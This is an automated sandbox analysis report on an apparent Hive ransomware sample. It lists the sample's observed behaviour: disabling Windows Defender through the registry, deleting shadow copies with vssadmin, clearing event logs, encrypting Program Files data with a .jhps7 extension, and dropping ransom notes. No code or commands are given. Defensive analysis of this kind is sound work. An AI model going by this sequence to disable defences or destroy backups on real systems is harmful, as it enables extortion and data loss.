Analysis Overview
SHA256
e27dcfb10467613e5ee52796f378f4983bce3f5beb8bc372cbd05da28691fd0d
Threat Level: Known bad
The file 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Hive
Modifies security service
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 19:26
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win10-en-20211208
Max time kernel
249s
Max time network
192s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Failed.m4a | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\gl_60x42.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_LSN7vgJSg6g0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sMVkP1NPZso0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_s2_hMgOyzJc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.sad.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_u20freu1K1A0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_zKwDXLNIbTg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_KgwdRolNN7Q0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_v479qaNH8wY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_5k0lcdEwqAg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_9RyT3Iu5DpM0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8oDcoUIAlmg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\beer.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_bUnJ5rFiI500.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Yj2jYxo9xW00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Xg25oex9Nls0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_gdPn1VxxTSI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_SNQAZIWfGI80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_46NHKIJyPm80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorMedTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_XKl21rT2vHI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_VnwmtVJie2E0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ss_60x42.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\RadialControl\Rotate_E7AD_HC_64x64.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\Logo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8LZ7MFiTx8o0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\GameModeTripeaks.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Flag.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\iheart-radio.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_onKnrY9HHIo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
